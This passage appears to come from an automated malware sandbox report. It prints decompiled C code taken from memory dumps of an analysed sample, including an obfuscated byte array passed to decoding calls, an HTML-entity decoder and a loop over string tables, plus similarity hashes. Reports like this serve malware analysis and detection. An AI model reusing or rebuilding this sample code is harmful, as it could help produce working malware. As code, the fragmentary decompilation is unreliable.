                                                                      					_v241 = 0xc1;
                                                                      					_v240 = 0x8e;
                                                                      					_v239 = 0xfe;
                                                                      					_v238 = 0xd6;
                                                                      					_v237 = 0xe7;
                                                                      					_v236 = 0x27;
                                                                      					_v235 = 0x75;
                                                                      					_v234 = 6;
                                                                      					_v233 = 0x8b;
                                                                      					_v232 = 0x49;
                                                                      					_v231 = _t184;
                                                                      					_v230 = 0xdc;
                                                                      					_v229 = 0xf;
                                                                      					_v228 = 0x30;
                                                                      					_v227 = 0xa0;
                                                                      					_v226 = 0x9e;
                                                                      					_v225 = 0xfd;
                                                                      					_v224 = 9;
                                                                      					_v223 = 0x85;
                                                                      					_v222 = 0xf1;
                                                                      					_v221 = 0xc8;
                                                                      					_v220 = 0xaa;
                                                                      					_v219 = 0x75;
                                                                      					_v218 = 0xc1;
                                                                      					_v217 = 8;
                                                                      					_v216 = 5;
                                                                      					_v215 = 0x79;
                                                                      					_v214 = 1;
                                                                      					_v213 = 0xe2;
                                                                      					_v212 = 0x97;
                                                                      					_v211 = 0xd8;
                                                                      					_v210 = 0xaf;
                                                                      					_v209 = 0x80;
                                                                      					_v208 = 0x38;
                                                                      					_v207 = 0x60;
                                                                      					_v206 = 0xb;
                                                                      					_v205 = 0x71;
                                                                      					_v204 = 0xe;
                                                                      					_v203 = 0x68;
                                                                      					_push(0x80);
                                                                      					_push(_t184);
                                                                      					_push( &_v152);
                                                                      					_v202 = 0x53;
                                                                      					_v201 = 0x77;
                                                                      					_v200 = 0x2f;
                                                                      					_v199 = 0xf;
                                                                      					_v198 = 0x61;
                                                                      					_v197 = 0xf6;
                                                                      					_v196 = 0x1d;
                                                                      					_v195 = 0x8e;
                                                                      					_v194 = 0x8f;
                                                                      					_v193 = 0x5c;
                                                                      					_v192 = 0xb2;
                                                                      					_v191 = 0x3d;
                                                                      					_v190 = 0x21;
                                                                      					_v189 = 0x74;
                                                                      					_v188 = 0x40;
                                                                      					_v187 = 0x4b;
                                                                      					_v186 = 0xb5;
                                                                      					_v185 = 6;
                                                                      					_v184 = 0x6e;
                                                                      					_v183 = 0xab;
                                                                      					_v182 = 0x7a;
                                                                      					_v181 = 0xbd;
                                                                      					_v180 = 0x8b;
                                                                      					_v179 = 0xa9;
                                                                      					_v178 = 0x7e;
                                                                      					_v177 = 0x32;
                                                                      					_v176 = 0x8f;
                                                                      					_v175 = 0x6e;
                                                                      					_v174 = 6;
                                                                      					_v173 = 0x24;
                                                                      					_v172 = 0xd9;
                                                                      					_v171 = 0x29;
                                                                      					_v170 = 0xa4;
                                                                      					_v169 = 0xa5;
                                                                      					_v168 = 0xbe;
                                                                      					_v167 = 0x26;
                                                                      					_v166 = 0x23;
                                                                      					_v165 = 0xfd;
                                                                      					_v164 = 0xee;
                                                                      					_v163 = 0xf1;
                                                                      					_v162 = 0x4c;
                                                                      					_v161 = 0xf;
                                                                      					_v160 = 0x74;
                                                                      					_v159 = 0x5e;
                                                                      					_v158 = 0x58;
                                                                      					_v157 = 0xfb;
                                                                      					_v156 = 0x91;
                                                                      					_v155 = 0x74;
                                                                      					_v154 = 0xef;
                                                                      					_v153 = 0x91;
                                                                      					L00A0B531();
                                                                      					asm("movsd");
                                                                      					asm("movsd");
                                                                      					asm("movsd");
                                                                      					asm("movsd");
                                                                      					_t231 = 7;
                                                                      					_push(0x11);
                                                                      					asm("movsb");
                                                                      					_push( &_v320);
                                                                      					_push( &_v152);
                                                                      					memcpy( &_v348, 0x4435b8, _t231 << 2);
                                                                      					L00A0B575();
                                                                      					_v8 =  &_v280;
                                                                      					_v296 =  *((intOrPtr*)(_t219 + 0x18));
                                                                      					_v12 = 0x90;
                                                                      					_v300 =  *(_t219 + 2) & 0x0000ffff;
                                                                      					if(E009CC860( &_v24,  &_v300,  &_v12, 0,  &_v288) != 0) {
                                                                      						L9:
                                                                      						_t184 = _v284;
                                                                      						if(_t184 != 0) {
                                                                      							E009D118A(_v292 + 0x68,  &(_t184[4]),  *_t184 & 0x000000ff, 0);
                                                                      							_t184 =  *0x4430d8(_v284);
                                                                      						}
                                                                      						L11:
                                                                      						if(_v24 == 0) {
                                                                      							goto L13;
                                                                      						}
                                                                      						return  *0x443100(_v24);
                                                                      					}
                                                                      					_push(0x1c);
                                                                      					_push( &_v348);
                                                                      					_push( &_v152);
                                                                      					L00A0B575();
                                                                      					_v8 =  &_v280;
                                                                      					_v12 = 0x9b;
                                                                      					_t184 = E009CC860( &_v24,  &_v300,  &_v12, 0,  &_v288);
                                                                      					if(_t184 == 0) {
                                                                      						goto L11;
                                                                      					}
                                                                      					goto L9;
                                                                      				}
                                                                      			}
                                                                      0x009cb70c
                                                                      0x009cb720
                                                                      0x009cb72b
                                                                      0x009cb72b
                                                                      0x009cb731
                                                                      0x009cb735
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009cb73a
                                                                      0x009cb6bd
                                                                      0x009cb6c5
                                                                      0x009cb6cc
                                                                      0x009cb6cd
                                                                      0x009cb6db
                                                                      0x009cb6f4
                                                                      0x009cb6fb
                                                                      0x009cb702
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009cb702

Strings
Memory Dump Source
• Source File: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000005.00000002.320628061.00000000009C0000.00000002.00020000.sdmp
• Associated: 00000005.00000002.320869373.0000000000A42000.00000002.00020000.sdmp

C-Code - Quality: 80%
E00A2E67A(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
	signed int _v8;
	void* _v11;
	char _v12;
	char _v13;
	char _v19;
	char _v20;
	char _v21;
	char _v22;
	char _v23;
	char _v24;
	signed int _v28;
	short _v30;
	char _v32;
	intOrPtr _v36;
	intOrPtr _v40;
	intOrPtr _v44;
	intOrPtr _v48;
	intOrPtr _v52;
	intOrPtr _v56;
	intOrPtr _v60;
	intOrPtr _v64;
	char _v76;
	char _v88;
	intOrPtr _v92;
	intOrPtr _v96;
	intOrPtr _v100;
	intOrPtr _v104;
	intOrPtr _v108;
	intOrPtr _v112;
	intOrPtr _v116;
	intOrPtr _v120;
	intOrPtr _v124;
	intOrPtr _v128;
	intOrPtr _v132;
	intOrPtr _v136;
	intOrPtr _v140;
	intOrPtr _v144;
	intOrPtr _v148;
	intOrPtr _v152;
	intOrPtr _v156;
	intOrPtr _v160;
	intOrPtr _v164;
	intOrPtr _v168;
	intOrPtr _v172;
	intOrPtr _v176;
	intOrPtr _v180;
	intOrPtr _v184;
	intOrPtr _v188;
	intOrPtr _v192;
	intOrPtr _v196;
	intOrPtr _v200;
	intOrPtr _v204;
	intOrPtr _v208;
	intOrPtr _v212;
	intOrPtr _v216;
	intOrPtr _v220;
	intOrPtr _v224;
	intOrPtr _v228;
	intOrPtr _v232;
	intOrPtr _v236;
	intOrPtr _v240;
	intOrPtr _v244;
	intOrPtr _v248;
	intOrPtr _v252;
	intOrPtr _v256;
	intOrPtr _v260;
	intOrPtr _v264;
	intOrPtr _v268;
	intOrPtr _v272;
	intOrPtr _v276;
	intOrPtr _v280;
	intOrPtr _v284;
	intOrPtr _v288;
	intOrPtr _v292;
	intOrPtr _v296;
	intOrPtr _v300;
	intOrPtr _v304;
	intOrPtr _v308;
	intOrPtr _v312;
	intOrPtr _v316;
	intOrPtr _v320;
	intOrPtr _v324;
	intOrPtr _v328;
	intOrPtr _v332;
	intOrPtr _v336;
	intOrPtr _v340;
	intOrPtr _v344;
	intOrPtr _v348;
	intOrPtr _v352;
	intOrPtr _v356;
	intOrPtr _v360;
	intOrPtr _v364;
	intOrPtr _v368;
	intOrPtr _v372;
	intOrPtr _v376;
	intOrPtr _v380;
	intOrPtr _v384;
	intOrPtr _v388;
	intOrPtr _v392;
	intOrPtr _v396;
	intOrPtr _v400;
	intOrPtr _v404;
	intOrPtr _v408;
	intOrPtr _v412;
	intOrPtr _v416;
	intOrPtr _v420;
	intOrPtr _v424;
	intOrPtr _v428;
	intOrPtr _v432;
	intOrPtr _v436;
	intOrPtr _v440;
	intOrPtr _v444;
	intOrPtr _v448;
	intOrPtr _v452;
	intOrPtr _v456;
	intOrPtr _v460;
	intOrPtr _v464;
	intOrPtr _v468;
	intOrPtr* _t200;
	char* _t202;
	signed int _t203;
	intOrPtr _t207;
	intOrPtr _t209;
	intOrPtr _t212;
	char _t215;
	intOrPtr _t216;
	short _t219;
	signed int _t224;
	intOrPtr* _t225;
	intOrPtr _t230;
	intOrPtr* _t231;
	intOrPtr* _t233;
	intOrPtr* _t238;
	signed int _t239;
	signed int _t242;
	intOrPtr _t243;
	intOrPtr* _t244;
	signed int _t245;
	void* _t247;
	void* _t248;
	void* _t249;

	_v64 = 0x413f68;
	_v60 = 0x413f70;
	_v56 = 0x413f74;
	_v52 = 0x413f78;
	_v48 = 0x413f80;
	_v44 = 0x413f88;
	_v24 = 0x26;
	_v23 = 0x3c;
	_v22 = 0x3e;
	_v21 = 0x22;
	_v20 = 0x20;
	_v19 = 0x27;
	_v468 = 0x413f90;
	_v464 = 0x413f98;
	_v460 = 0x413fa0;
	_v456 = 0x413fa8;
	_v452 = 0x413fb0;
	_v448 = 0x413fb8;
	_v444 = 0x413fc0;
	_v440 = 0x413fc8;
	_v436 = 0x413fd0;
	_v432 = 0x413fd8;
	_v428 = 0x413fe0;
	_v424 = 0x413fe8;
	_v420 = 0x413ff0;
	_v416 = 0x413ff8;
	_v412 = 0x414000;
	_v408 = 0x414008;
	_v404 = 0x414010;
	_v400 = 0x414018;
	_v396 = 0x414020;
	_v392 = 0x414028;
	_v388 = 0x414030;
	_v384 = 0x414038;
	_v380 = 0x414040;
	_v376 = 0x414048;
	_v372 = 0x414050;
	_v368 = 0x414058;
	_v364 = 0x414060;
	_v360 = 0x414068;
	_v356 = 0x414070;
	_v352 = 0x414078;
	_v348 = 0x414080;
	_v344 = 0x414088;
	_v340 = 0x414090;
	_v336 = 0x414098;
	_v332 = 0x4140a0;
	_v328 = 0x4140a8;
	_v324 = 0x4140b0;
	_v320 = 0x4140b8;
	_v316 = 0x4140c0;
	_v312 = 0x4140c8;
	_v308 = 0x4140d0;
	_v304 = 0x4140d8;
	_v300 = 0x4140e0;
	_v296 = 0x4140e8;
	_v292 = 0x4140f0;
	_v288 = 0x4140f8;
	_v284 = 0x414100;
	_v280 = 0x414108;
	_v276 = 0x414110;
	_v272 = 0x414118;
	_v268 = 0x414120;
	_v264 = 0x414128;
	_v260 = 0x414130;
	_v256 = 0x414138;
	_v252 = 0x414140;
	_v248 = 0x414148;
	_v244 = 0x414150;
	_v240 = 0x414158;
	_v236 = 0x414160;
	_v232 = 0x414168;
	_v228 = 0x414170;
	_v224 = 0x414178;
	_v220 = 0x414180;
	_v216 = 0x414188;
	_v212 = 0x414190;
	_v208 = 0x414198;
	_v204 = 0x4141a0;
	_t200 = _a8;
	_v28 = _v28 | 0xffffffff;
	_t224 = 0;
	_t247 = 0;
	_v200 = 0x4141a8;
	_v196 = 0x4141b0;
	_v192 = 0x4141b8;
	_v188 = 0x4141c0;
	_v184 = 0x4141c8;
	_v180 = 0x4141d0;
	_v176 = 0x4141d8;
	_v172 = 0x4141e0;
	_v168 = 0x4141e8;
	_v164 = 0x4141f0;
	_v160 = 0x4141f8;
	_v156 = 0x414200;
	_v152 = 0x414208;
	_v148 = 0x414210;
	_v144 = 0x414218;
	_v140 = 0x414220;
	_v136 = 0x414228;
	_v132 = 0x414230;
	_v128 = 0x414238;
	_v124 = 0x414240;
	_v120 = 0x414248;
	_v116 = 0x414250;
	_v112 = 0x414258;
	_v108 = 0x414260;
	_v104 = 0x414268;
	_v100 = 0x414270;
	_v96 = 0x414278;
	_v92 = 0x414280;
	if( *_t200 == 0) {
		L45:
		_t202 = _a4 + _t224;
		 *_t202 = 0;
		if(_a20 == 0 || _t224 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
			return _t202;
		} else {
			 *((char*)(_t202 - 1)) = 0;
			return _t202;
		}
	}
	while(_a12 == 0xffffffff || _a12 > _t247) {
		_t225 = _t247 + _t200;
		_t203 =  *_t225;
		_v13 = _t203;
		if(_t203 != 0x26) {
			L33:
			if(_a16 == 0 || _t203 > 0x20) {
				 *((char*)(_t224 + _a4)) = _t203;
				_t224 = _t224 + 1;
			} else {
				if(_t224 != _v28) {
					 *((char*)(_t224 + _a4)) = 0x20;
					_t224 = _t224 + 1;
					if(_a20 != 0 && _t224 == 1) {
						_t224 = 0;
					}
				}
				_v28 = _t224;
			}
			_t247 = _t247 + 1;
			L43:
			_t200 = _a8;
			if( *((char*)(_t247 + _t200)) != 0) {
				continue;
			}
			break;
		}
		_t242 = 0;
		_v36 = _t225 + 1;
		while(1) {
			_push( *((intOrPtr*)(_t248 + _t242 * 4 - 0x3c)));
			L00A303B6();
			_push(_t203);
			_push( *((intOrPtr*)(_t248 + _t242 * 4 - 0x3c)));
			_v8 = _t203;
			_push(_v36);
			L00A304AE();
			_t249 = _t249 + 0x10;
			if(_t203 == 0) {
				break;
			}
			_t242 = _t242 + 1;
			if(_t242 < 6) {
				continue;
                                                                      						}
                                                                      						_t207 = _a8;
                                                                      						if( *((char*)(_t247 + _t207 + 1)) != 0x23) {
                                                                      							L29:
                                                                      							_v8 = _v8 & 0x00000000;
                                                                      							while(1) {
                                                                      								_t209 =  *((intOrPtr*)(_t248 + _v8 * 4 - 0x1d0));
                                                                      								_push(_t209);
                                                                      								_v40 = _t209;
                                                                      								L00A303B6();
                                                                      								_t243 = _t209;
                                                                      								_push(_t243);
                                                                      								_push(_v40);
                                                                      								_push(_v36);
                                                                      								L00A304AE();
                                                                      								_t249 = _t249 + 0x10;
                                                                      								if(_t209 == 0) {
                                                                      									break;
                                                                      								}
                                                                      								_v8 = _v8 + 1;
                                                                      								if(_v8 < 0x5f) {
                                                                      									continue;
                                                                      								}
                                                                      								_t203 = _v13;
                                                                      								goto L33;
                                                                      							}
                                                                      							 *((char*)(_t224 + _a4)) = _v8 - 0x5f;
                                                                      							_t224 = _t224 + 1;
                                                                      							_t247 = _t247 + _t243 + 1;
                                                                      							goto L43;
                                                                      						}
                                                                      						_t128 = _t207 + 2; // 0x2
                                                                      						_t244 = _t247 + _t128;
                                                                      						_t230 =  *_t244;
                                                                      						if(_t230 == 0x78 || _t230 == 0x58) {
                                                                      							_t159 = _t207 + 3; // 0x3
                                                                      							_t238 = _t247 + _t159;
                                                                      							_t231 = _t238;
                                                                      							_t245 = 0;
                                                                      							while(1) {
                                                                      								_t212 =  *_t231;
                                                                      								if(_t212 == 0) {
                                                                      									break;
                                                                      								}
                                                                      								if(_t212 == 0x3b) {
                                                                      									L27:
                                                                      									if(_t245 <= 0) {
                                                                      										goto L29;
                                                                      									}
                                                                      									_push(_t245);
                                                                      									_push(_t238);
                                                                      									_push( &_v88);
                                                                      									L00A3043C();
                                                                      									 *((char*)(_t248 + _t245 - 0x54)) = 0;
                                                                      									_t215 = E00A25384( &_v88,  &_v88);
                                                                      									_t249 = _t249 + 0x10;
                                                                      									 *((char*)(_t224 + _a4)) = _t215;
                                                                      									_t224 = _t224 + 1;
                                                                      									_t247 = _t247 + _t245 + 4;
                                                                      									goto L43;
                                                                      								}
                                                                      								_t245 = _t245 + 1;
                                                                      								if(_t245 >= 4) {
                                                                      									break;
                                                                      								}
                                                                      								_t231 = _t231 + 1;
                                                                      							}
                                                                      							_t245 = _t245 | 0xffffffff;
                                                                      							goto L27;
                                                                      						} else {
                                                                      							_t233 = _t244;
                                                                      							_t239 = 0;
                                                                      							while(1) {
                                                                      								_t216 =  *_t233;
                                                                      								if(_t216 == 0) {
                                                                      									break;
                                                                      								}
                                                                      								if(_t216 == 0x3b) {
                                                                      									_v8 = _t239;
                                                                      									L18:
                                                                      									if(_v8 <= 0) {
                                                                      										goto L29;
                                                                      									}
                                                                      									L00A3043C();
                                                                      									 *((char*)(_t248 + _v8 - 0x48)) = 0;
                                                                      									_t219 =  &_v76;
                                                                      									L00A30430();
                                                                      									_t249 = _t249 + 0x10;
                                                                      									_v32 = _t219;
                                                                      									_v12 = 0;
                                                                      									asm("stosb");
                                                                      									_v30 = 0;
                                                                      									 *0x4120d4(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0, _t219,  &_v76, _t244, _v8);
                                                                      									 *((char*)(_t224 + _a4)) = _v12;
                                                                      									_t224 = _t224 + 1;
                                                                      									_t247 = _t247 + _v8 + 3;
                                                                      									goto L43;
                                                                      								}
                                                                      								_t239 = _t239 + 1;
                                                                      								if(_t239 >= 6) {
                                                                      									break;
                                                                      								}
                                                                      								_t233 = _t233 + 1;
                                                                      							}
                                                                      							_v8 = _v8 | 0xffffffff;
                                                                      							goto L18;
                                                                      						}
                                                                      					}
                                                                      					 *((char*)(_t224 + _a4)) =  *((intOrPtr*)(_t248 + _t242 - 0x14));
                                                                      					_t224 = _t224 + 1;
                                                                      					_t247 = _t247 + _v8 + 1;
                                                                      					goto L43;
                                                                      				}
                                                                      				goto L45;
                                                                      			}


                                                                      0x00a2e685
                                                                      0x00a2e68c
                                                                      0x00a2e693
                                                                      0x00a2e69a
                                                                      0x00a2e6a1
                                                                      0x00a2e6a8
                                                                      0x00a2e6af
                                                                      0x00a2e6b3
                                                                      0x00a2e6b7
                                                                      0x00a2e6bb
                                                                      0x00a2e6bf
                                                                      0x00a2e6c3
                                                                      0x00a2e6c7
                                                                      0x00a2e6d1
                                                                      0x00a2e6db
                                                                      0x00a2e6e5
                                                                      0x00a2e6ef
                                                                      0x00a2e6f9
                                                                      0x00a2e703
                                                                      0x00a2e70d
                                                                      0x00a2e717
                                                                      0x00a2e721
                                                                      0x00a2e72b
                                                                      0x00a2e735
                                                                      0x00a2e73f
                                                                      0x00a2e749
                                                                      0x00a2e753
                                                                      0x00a2e75d
                                                                      0x00a2e767
                                                                      0x00a2e771
                                                                      0x00a2e77b
                                                                      0x00a2e785
                                                                      0x00a2e78f
                                                                      0x00a2e799
                                                                      0x00a2e7a3
                                                                      0x00a2e7ad
                                                                      0x00a2e7b7
                                                                      0x00a2e7c1
                                                                      0x00a2e7cb
                                                                      0x00a2e7d5
                                                                      0x00a2e7df
                                                                      0x00a2e7e9
                                                                      0x00a2e7f3
                                                                      0x00a2e7fd
                                                                      0x00a2e807
                                                                      0x00a2e811
                                                                      0x00a2e81b
                                                                      0x00a2e825
                                                                      0x00a2e82f
                                                                      0x00a2e839
                                                                      0x00a2e843
                                                                      0x00a2e84d
                                                                      0x00a2e857
                                                                      0x00a2e861
                                                                      0x00a2e86b
                                                                      0x00a2e875
                                                                      0x00a2e87f
                                                                      0x00a2e889
                                                                      0x00a2e893
                                                                      0x00a2e89d
                                                                      0x00a2e8a7
                                                                      0x00a2e8b1
                                                                      0x00a2e8bb
                                                                      0x00a2e8c5
                                                                      0x00a2e8cf
                                                                      0x00a2e8d9
                                                                      0x00a2e8e3
                                                                      0x00a2e8ed
                                                                      0x00a2e8f7
                                                                      0x00a2e901
                                                                      0x00a2e90b
                                                                      0x00a2e915
                                                                      0x00a2e91f
                                                                      0x00a2e929
                                                                      0x00a2e933
                                                                      0x00a2e93d
                                                                      0x00a2e947
                                                                      0x00a2e951
                                                                      0x00a2e95b
                                                                      0x00a2e965
                                                                      0x00a2e968
                                                                      0x00a2e96c
                                                                      0x00a2e96e
                                                                      0x00a2e972
                                                                      0x00a2e97c
                                                                      0x00a2e986
                                                                      0x00a2e990
                                                                      0x00a2e99a
                                                                      0x00a2e9a4
                                                                      0x00a2e9ae
                                                                      0x00a2e9b8
                                                                      0x00a2e9c2
                                                                      0x00a2e9cc
                                                                      0x00a2e9d6
                                                                      0x00a2e9e0
                                                                      0x00a2e9ea
                                                                      0x00a2e9f4
                                                                      0x00a2e9fe
                                                                      0x00a2ea08
                                                                      0x00a2ea12
                                                                      0x00a2ea1c
                                                                      0x00a2ea23
                                                                      0x00a2ea2a
                                                                      0x00a2ea31
                                                                      0x00a2ea38
                                                                      0x00a2ea3f
                                                                      0x00a2ea46
                                                                      0x00a2ea4d
                                                                      0x00a2ea54
                                                                      0x00a2ea5b
                                                                      0x00a2ea62
                                                                      0x00a2ea69
                                                                      0x00a2ec57
                                                                      0x00a2ec5a
                                                                      0x00a2ec60
                                                                      0x00a2ec63
                                                                      0x00a2ec76
                                                                      0x00a2ec6f
                                                                      0x00a2ec6f
                                                                      0x00000000
                                                                      0x00a2ec6f
                                                                      0x00a2ec63
                                                                      0x00a2ea70
                                                                      0x00a2ea7f
                                                                      0x00a2ea82
                                                                      0x00a2ea86
                                                                      0x00a2ea89
                                                                      0x00a2ec06
                                                                      0x00a2ec0a
                                                                      0x00a2ec44
                                                                      0x00a2ec47
                                                                      0x00a2ec10
                                                                      0x00a2ec13
                                                                      0x00a2ec18
                                                                      0x00a2ec1c
                                                                      0x00a2ec21
                                                                      0x00a2ec28
                                                                      0x00a2ec28
                                                                      0x00a2ec21
                                                                      0x00a2ec2a
                                                                      0x00a2ec2a
                                                                      0x00a2ec48
                                                                      0x00a2ec49
                                                                      0x00a2ec49
                                                                      0x00a2ec50
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2ec50
                                                                      0x00a2ea8f
                                                                      0x00a2ea92
                                                                      0x00a2ea95
                                                                      0x00a2ea95
                                                                      0x00a2ea99
                                                                      0x00a2ea9e
                                                                      0x00a2ea9f
                                                                      0x00a2eaa3
                                                                      0x00a2eaa6
                                                                      0x00a2eaa9
                                                                      0x00a2eaae
                                                                      0x00a2eab3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2eab5
                                                                      0x00a2eab9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2eabb
                                                                      0x00a2eac3
                                                                      0x00a2ebce
                                                                      0x00a2ebce
                                                                      0x00a2ebd2
                                                                      0x00a2ebd5
                                                                      0x00a2ebdc
                                                                      0x00a2ebdd
                                                                      0x00a2ebe0
                                                                      0x00a2ebe5
                                                                      0x00a2ebe7
                                                                      0x00a2ebe8
                                                                      0x00a2ebeb
                                                                      0x00a2ebee
                                                                      0x00a2ebf3
                                                                      0x00a2ebf8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2ebfa
                                                                      0x00a2ec01
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2ec03
                                                                      0x00000000
                                                                      0x00a2ec03
                                                                      0x00a2ec37
                                                                      0x00a2ec3a
                                                                      0x00a2ec3b
                                                                      0x00000000
                                                                      0x00a2ec3b
                                                                      0x00a2eac9
                                                                      0x00a2eac9
                                                                      0x00a2eacd
                                                                      0x00a2ead2
                                                                      0x00a2eb83
                                                                      0x00a2eb83
                                                                      0x00a2eb87
                                                                      0x00a2eb89
                                                                      0x00a2eb98
                                                                      0x00a2eb98
                                                                      0x00a2eb9c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a2eb8f
                                                                      Disassembly address column (0x00a2ead2 to 0x00a2ebc8); the instruction text for these addresses was not extracted.

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000005.00000002.320628061.00000000009C0000.00000002.00020000.sdmp
                                                                      • Associated: 00000005.00000002.320869373.0000000000A42000.00000002.00020000.sdmp
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @A$ AA$ BA$(@A$(AA$(BA$0@A$0AA$0BA$8@A$8AA$8BA$@@A$@AA$@BA$H@A$HAA$HBA$P@A$PAA$PBA$X@A$XAA$XBA$`@A$`AA$`BA$h?A$h@A$hAA$hBA$p?A$p@A$pAA$pBA$t?A$x?A$x@A$xAA$xBA$?A$?A$@A$@A$AA$AA
                                                                      • API String ID: 0-2473593039
                                                                      • Opcode ID: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
                                                                      • Instruction ID: 476562b125bdbaf388b0e73eedcde7d5e76cc374054c9ca178fa8d25df30853d
                                                                      • Opcode Fuzzy Hash: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
                                                                      • Instruction Fuzzy Hash: F2F149B0800269DEDB21CF95D9487DEBFB0AB96308F5081DAD5593B241C3B90BC9CF98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 21%
                                                                      			E00A21478(void* __ecx, void* __fp0) {
                                                                      				void* __esi;
                                                                      				void* _t57;
                                                                      				void* _t58;
                                                                      				void* _t65;
                                                                      				void* _t68;
                                                                      				void* _t71;
                                                                      				void* _t84;
                                                                      				signed int _t87;
                                                                      				void* _t89;
                                                                      				signed int _t93;
                                                                      				intOrPtr _t97;
                                                                      				intOrPtr _t98;
                                                                      				void* _t100;
                                                                      				void* _t102;
                                                                      				void* _t103;
                                                                      				void* _t105;
                                                                      				void* _t111;
                                                                      
                                                                      				_t111 = __fp0;
                                                                      				_t89 = __ecx;
                                                                      				_t100 = _t102 - 0x6c;
                                                                      				_t103 = _t102 - 0x474;
                                                                      				 *((intOrPtr*)(_t100 + 0x4c)) = 0x4125f8;
                                                                      				 *((intOrPtr*)(_t100 + 0x50)) = 0x412608;
                                                                      				 *((intOrPtr*)(_t100 + 0x54)) = 0x412618;
                                                                      				 *((intOrPtr*)(_t100 + 0x58)) = 0x41262c;
                                                                      				 *((intOrPtr*)(_t100 + 0x1c)) = 0x41263c;
                                                                      				 *((intOrPtr*)(_t100 + 0x20)) = 0x412648;
                                                                      				 *((intOrPtr*)(_t100 + 0x24)) = 0x412654;
                                                                      				 *((intOrPtr*)(_t100 + 0x28)) = 0x412664;
                                                                      				 *((intOrPtr*)(_t100 + 0x3c)) = 0x412670;
                                                                      				 *((intOrPtr*)(_t100 + 0x40)) = 0x412680;
                                                                      				 *((intOrPtr*)(_t100 + 0x44)) = 0x412690;
                                                                      				 *((intOrPtr*)(_t100 + 0x48)) = 0x4126a4;
                                                                      				 *((intOrPtr*)(_t100 + 0x2c)) = 0x4126b4;
                                                                      				 *((intOrPtr*)(_t100 + 0x30)) = 0x4126c0;
                                                                      				 *((intOrPtr*)(_t100 + 0x34)) = 0x4126cc;
                                                                      				 *((intOrPtr*)(_t100 + 0x38)) = 0x4126dc;
                                                                      				 *((intOrPtr*)(_t100 + 0x5c)) = 0x4126e8;
                                                                      				 *((intOrPtr*)(_t100 + 0x60)) = 0x412700;
                                                                      				 *((intOrPtr*)(_t100 + 0x64)) = 0x412718;
                                                                      				 *((intOrPtr*)(_t100 + 0x68)) = 0x412734;
                                                                      				_t87 = 0;
                                                                      				do {
                                                                      					_push(0x7f);
                                                                      					_push(0);
                                                                      					_push(_t100 - 0x63);
                                                                      					 *((char*)(_t100 - 0x64)) = 0;
                                                                      					L00A303F4();
                                                                      					_push(_t100 - 0x64);
                                                                      					_t93 = _t87 << 2;
                                                                      					_push( *((intOrPtr*)(_t100 + _t93 + 0x4c)));
                                                                      					_push( *((intOrPtr*)(_t100 + 0x78)));
                                                                      					_t57 = 0x7f;
                                                                      					_t58 = E00A2D9F2(_t57, _t89);
                                                                      					_t103 = _t103 + 0x18;
                                                                      					if(_t58 == 0) {
                                                                      						E00A2104A(_t100 - 0x408);
                                                                      						_push(_t100 - 0x64);
                                                                      						_push(_t100 - 0x1f4);
                                                                      						L00A303FA();
                                                                      						_t97 =  *((intOrPtr*)(_t100 + 0x78));
                                                                      						 *((intOrPtr*)(_t100 - 0x37c)) =  *((intOrPtr*)(_t100 + 0x7c));
                                                                      						_t34 = _t87 + 1; // 0x1
                                                                      						 *((intOrPtr*)(_t100 - 0x1f8)) = _t34;
                                                                      						_push(_t100 - 0x2f8);
                                                                      						_push( *((intOrPtr*)(_t100 + _t93 + 0x1c)));
                                                                      						_push(_t97);
                                                                      						_t65 = 0x7f;
                                                                      						E00A2D9F2(_t65, _t89);
                                                                      						_push(_t100 - 0x3fc);
                                                                      						_push(0x41274c);
                                                                      						_push(_t97);
                                                                      						_t68 = 0x7f;
                                                                      						E00A2D9F2(_t68, _t89);
                                                                      						_push(_t100 - 0x378);
                                                                      						_push(0x412760);
                                                                      						_push(_t97);
                                                                      						_t71 = 0x7f;
                                                                      						E00A2D9F2(_t71, _t89);
                                                                      						_t105 = _t103 + 0x2c;
                                                                      						if(_t87 != 3) {
                                                                      							_push(_t100 - 0x278);
                                                                      							_push(0x412664);
                                                                      							_push(_t97);
                                                                      							_t84 = 0x7f;
                                                                      							E00A2D9F2(_t84, _t89);
                                                                      							_t105 = _t105 + 0xc;
                                                                      						}
                                                                      						E00A2D9CB(_t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x2c)), _t100 - 0x74);
                                                                      						E00A2D9CB(_t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x5c)), _t100 - 0x70);
                                                                      						_t103 = _t105 + 0x18;
                                                                      						_t98 =  *((intOrPtr*)(_t100 + 0x74));
                                                                      						E00A212DE(_t98, _t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x3c)), _t100 - 0x174, 0);
                                                                      						_push(_t98 + 0xa9c);
                                                                      						_push(_t100 - 0xf4);
                                                                      						L00A303FA();
                                                                      						_pop(_t89);
                                                                      						_t58 = E00A21279(_t100 - 0x408, _t111, _t98);
                                                                      					}
                                                                      					_t87 = _t87 + 1;
                                                                      				} while (_t87 < 4);
                                                                      				return _t58;
                                                                      			}

                                                                      Disassembly address column for E00A21478 (0x00a21478 to 0x00a2163f); the instruction text for these addresses was not extracted.

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Offset: 009C0000, based on PE: true
